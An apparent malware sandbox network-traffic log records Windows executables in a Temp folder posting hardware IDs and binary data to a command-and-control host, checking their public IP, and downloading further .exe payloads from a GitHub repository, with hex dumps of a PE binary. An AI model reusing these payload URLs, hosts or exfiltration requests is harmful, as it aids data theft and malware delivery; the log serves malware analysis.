                                                                                                                                                                                                                                                            2024-12-21 21:16:34 UTC8723OUTData Raw: 2d 2d 51 59 46 33 32 4b 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 59 46 33 32 4b 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 59 46 33 32 4b 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 51 59 46 33 32 4b 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                                            Data Ascii: --QYF32KC9Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--QYF32KC9Content-Disposition: form-data; name="pid"2--QYF32KC9Content-Disposition: form-data; name="lid"FATE99--test--QYF32KC9Content-Dispositi
                                                                                                                                                                                                                                                            2024-12-21 21:16:44 UTC1142INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=h7eoc08t5feijfbf5tm2lmsdla; expires=Wed, 16 Apr 2025 15:03:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iZ8G4YRBTCIkR2hUm8jwBlELu6VGoP9ltJeNtuxkpcNf%2BQqL5%2BWFOFsHAkEiXgOO%2FG%2BWJtWc%2B4IlwxQDy%2BOAca%2Fl3%2B5ldAnRCrcp5AKOZmwpakBKhW1a2c8%2FbieJEtaFa7ocbuUM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae4dc18f0728a-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1780&rtt_var=679&sent=12&recv=14&lost=0&retrans=0&sent_bytes=2848&recv_bytes=9655&delivery_rate=1599123&cwnd=227&unsent_bytes=0&cid=a310d6f43eca2794&ts=10458&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:16:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:16:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            4192.168.2.44980134.226.108.1554435496C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:43 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                                                                                                            Host: httpbin.org
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            2024-12-21 21:16:43 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:43 GMT
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Server: gunicorn/19.9.0
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                            2024-12-21 21:16:43 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                                                                                                            Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            5192.168.2.44980220.233.83.1454437712C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:44 UTC111OUTGET /Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: github.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-12-21 21:16:45 UTC562INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Server: GitHub.com
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                            Location: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/biyjdfjadaw.exe
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                            2024-12-21 21:16:45 UTC3378INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            6192.168.2.44980320.233.83.1454437712C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:44 UTC111OUTGET /Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: github.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-12-21 21:16:45 UTC562INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Server: GitHub.com
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                            Location: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/ktyihkdfesf.exe
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                            2024-12-21 21:16:45 UTC3376INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            7192.168.2.449805172.67.209.2024437908C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:46 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=HDPAKRG3
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20376
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:16:46 UTC15331OUTData Raw: 2d 2d 48 44 50 41 4b 52 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 44 50 41 4b 52 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 44 50 41 4b 52 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 48 44 50 41 4b 52 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                                            Data Ascii: --HDPAKRG3Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--HDPAKRG3Content-Disposition: form-data; name="pid"3--HDPAKRG3Content-Disposition: form-data; name="lid"FATE99--test--HDPAKRG3Content-Dispositi
                                                                                                                                                                                                                                                            2024-12-21 21:16:46 UTC5045OUTData Raw: b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: Mn 64F6(X&7~`aO@dR<x)
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=o7uccba88jsou60tvk2l1ue39b; expires=Wed, 16 Apr 2025 15:03:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Di%2BNRBi%2FtN9TZs%2Bgu0D3yNEc%2Fy4zkPULqUWQwcxfOhkxcoCZVADgxe7oGrIc2tKC0thVFd8SL54H4XWBC3QquTnCZzt7Ilm2bVEYiphXTQYTGLB02yndXJrKFdHIgx%2BefsFcfOJQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae5270a8d8c89-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1962&rtt_var=746&sent=18&recv=26&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21331&delivery_rate=1457085&cwnd=202&unsent_bytes=0&cid=533b3c16304c6e37&ts=1028&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            8192.168.2.449806185.199.110.1334437712C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:46 UTC122OUTGET /Urijas/moperats/refs/heads/main/ktyihkdfesf.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC901INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 147968
                                                                                                                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            ETag: "3e9c4b1e9cdeb98d530cbedabe09c3091bd9f712d1fef28624dd688e9d17d2e1"
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-GitHub-Request-Id: 8564:39A855:73444B:82B7FA:6767303E
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:47 GMT
                                                                                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                                                                                            X-Served-By: cache-ewr-kewr1740057-EWR
                                                                                                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                                                                                                                            X-Timer: S1734815807.003244,VS0,VE58
                                                                                                                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                            X-Fastly-Request-ID: 708ddc26b57c2df16e7e781fd2550bbf55bc231f
                                                                                                                                                                                                                                                            Expires: Sat, 21 Dec 2024 21:21:47 GMT
                                                                                                                                                                                                                                                            Source-Age: 0
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 a3 98 61 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 de 01 00 00 60 00 00 00 00 00 00 c0 85 01 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 23 00 00 04 00 00 00 00 00 00 02 00 00 82 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 17 02 00 c8 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELag`@#(
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: ff 15 98 19 42 00 cc cc cc cc cc cc cc cc 55 89 e5 50 c7 45 fc 00 00 00 00 64 a1 30 00 00 00 51 8b 48 02 89 4d fc 59 83 c4 04 5d c3 cc cc 31 c0 64 f7 05 30 00 00 00 68 00 00 00 0f 95 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 74 24 14 64 a1 30 00 00 00 8b 78 0c 83 c7 14 8b 2d 20 1a 42 00 89 fb 0f 1f 40 00 8b 1b 39 fb 74 0a 56 ff 73 28 ff d5 85 c0 75 f0 39 fb 0f 95 c0 5e 5f 5b 5d c2 04 00 cc cc cc cc 53 57 56 64 a1 30 00 00 00 8b 78 0c 83 c7 14 8b 35 20 1a 42 00 89 fb 66 0f 1f 84 00 00 00 00 00 8b 1b 39 fb 74 13 68 2a 15 42 00 ff 73 28 ff d6 85 c0 75 ec e9 2f 01 00 00 64 a1 30 00 00 00 8b 78 0c 83 c7 14 89 fb 66 0f 1f 84 00 00 00 00 00 8b 1b 39 fb 74 13 68 d4 15 42 00 ff 73 28 ff d6 85 c0 75 ec e9 ff 00 00 00 64 a1 30 00 00 00 8b 78
                                                                                                                                                                                                                                                            Data Ascii: BUPEd0QHMY]1d0hUSWVt$d0x- B@9tVs(u9^_[]SWVd0x5 Bf9th*Bs(u/d0xf9thBs(ud0x
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: e8 67 eb 00 00 8b 3d fc 4f 63 00 8d 75 c4 89 f1 e8 57 ee 00 00 50 ff d7 89 f1 e8 fd ed 00 00 8d 7d dc 89 f9 e8 f3 ed 00 00 89 f1 e8 3c eb 00 00 89 f9 e8 35 eb 00 00 8d 5d 08 8d 4b 2c e8 2a eb 00 00 8d 4b 18 e8 22 eb 00 00 8d 4b 0c e8 1a eb 00 00 89 d9 e8 13 eb 00 00 8d 65 f4 5e 5f 5b 5d c2 68 00 cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 48 03 00 00 8d 5d 08 8d 4d 94 68 0a 15 42 00 e8 74 ea 00 00 8d 8d 6c ff ff ff 68 0a 15 42 00 e8 64 ea 00 00 8b 85 98 00 00 00 83 f8 02 74 13 83 f8 01 74 18 85 c0 75 4d 8d b5 ec fd ff ff 6a 1c eb 12 8d b5 ec fd ff ff 6a 28 eb 08 8d b5 ec fd ff ff 6a 1a 56 e8 be fd 00 00 8d bd ac fc ff ff 8d 5d 94 89 d9 56 57 e8 3c eb 00 00 89 d9 57 e8 e4 ea 00 00 89 f9 e8 7d ea 00 00 89 f1 8d 5d 08 e8 73 ea 00 00 8d 75 20 83 7b 24
                                                                                                                                                                                                                                                            Data Ascii: g=OcuWP}<5]K,*K"Ke^_[]hUSWVH]MhBtlhBdttuMjj(jV]VW<W}]su {$
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 00 00 89 f9 e8 01 e6 00 00 8d 85 ec fd ff ff 50 ff 75 ec ff 15 00 50 63 00 85 c0 8d 5d c8 0f 84 b6 fc ff ff 89 d9 68 be 0b 42 00 56 e8 e9 e6 00 00 89 f1 8d 85 18 fe ff ff 50 8d 7d e0 57 e8 d7 e6 00 00 8d 5d a0 89 d9 57 e8 1c e6 00 00 89 f9 e8 b5 e5 00 00 89 f1 e8 ae e5 00 00 89 e6 83 ec 0c 89 e1 53 e8 71 e5 00 00 e8 8c f8 00 00 89 f4 8d 75 d4 85 c0 74 92 89 f9 68 0a 15 42 00 e8 17 e5 00 00 89 f9 68 f9 00 42 00 8d bd 60 ff ff ff 57 e8 84 e6 00 00 89 f9 68 be 0b 42 00 8d bd 78 ff ff ff 57 e8 71 e6 00 00 89 f9 8d 45 14 50 8d 5d b8 53 e8 02 e6 00 00 89 d9 68 be 0b 42 00 56 e8 55 e6 00 00 8d 7d e0 89 f9 56 e8 9a e5 00 00 89 f1 e8 33 e5 00 00 89 d9 e8 2c e5 00 00 8d 8d 78 ff ff ff e8 21 e5 00 00 8d 8d 60 ff ff ff e8 16 e5 00 00 89 f9 8d 85 18 fe ff ff 50 56 e8
                                                                                                                                                                                                                                                            Data Ascii: PuPc]hBVP}W]WSquthBhB`WhBxWqEP]ShBVU}V3,x!`PV
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 7d c8 89 f9 e8 9f e3 00 00 50 ff d6 89 f9 e8 45 e3 00 00 8d b5 ec fd ff ff 89 f1 e8 38 e3 00 00 6a 04 8d 45 e0 50 e8 9d f0 00 00 89 f9 e8 76 e0 00 00 89 f1 e9 4a f7 ff ff ff 75 90 ff 15 08 50 63 00 8d 4d 94 e8 0e e3 00 00 8d 8d 6c ff ff ff e8 03 e3 00 00 eb 13 8d 4d c8 e8 49 e0 00 00 8d 4d a0 e8 41 e0 00 00 8d 75 08 8d 8d 6c ff ff ff e8 33 e0 00 00 8d 4d 94 e8 2b e0 00 00 89 f1 e8 24 e0 00 00 8d 4d 14 e8 1c e0 00 00 8d 4d 20 e8 14 e0 00 00 8d 4e 54 e8 0c e0 00 00 8d 4e 40 e8 04 e0 00 00 83 c6 34 89 f1 e8 fa df 00 00 8d 4d 30 e8 f2 df 00 00 8d 65 f4 5e 5f 5b 5d c2 94 00 e8 ad ca 01 00 cc cc cc 55 89 e5 53 57 56 83 ec 1c 83 bd 80 00 00 00 00 0f 84 fd 00 00 00 8d 45 08 8d 48 0c 89 4d d8 8d 48 18 89 4d dc 8d 48 2c 89 4d e0 83 c0 38 89 45 e4 31 f6 31 db 66 66
                                                                                                                                                                                                                                                            Data Ascii: }PE8jEPvJuPcMlMIMAul3M+$MM NTN@4M0e^_[]USWVEHMHMH,M8E11ff
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 50 08 c7 02 01 00 00 00 89 15 dc 46 42 00 83 c0 10 eb 02 31 c0 5e 5f c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 44 24 08 85 c0 74 6a 8d 48 f0 c7 40 f0 01 00 00 00 8b 50 f8 85 d2 74 29 83 3a 00 74 24 39 15 dc 46 42 00 75 06 89 0d dc 46 42 00 8b 72 04 01 70 f4 8b 72 08 89 70 f8 8b 52 08 85 d2 74 03 89 4a 0c 8b 50 fc 85 d2 74 29 83 3a 00 74 24 39 0d dc 46 42 00 75 06 89 15 dc 46 42 00 8b 48 f4 01 4a 04 8b 48 f8 89 4a 08 8b 40 f8 85 c0 74 03 89 50 0c 5e c2 04 00 cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 5c 24 14 c6 03 00 c6 43 01 00 c6 43 02 00 c6 43 03 00 c6 43 04 00 c6 43 05 00 c6 43 06 00 c6 43 07 00 c6 43 08 00 c6 43 09 00 c6 43 0a 00 c6 43 0b 00 c6 43 0c 00 c6 43 0d 00 c6 43 0e 00 c6 43 0f 00 c6 43 10 00 c6 43 11 00 c6 43 12 00 c6 43 13 00 c6 43
                                                                                                                                                                                                                                                            Data Ascii: PFB1^_VD$tjH@Pt):t$9FBuFBrprpRtJPt):t$9FBuFBHJHJ@tP^USWV\$CCCCCCCCCCCCCCCCCCCC
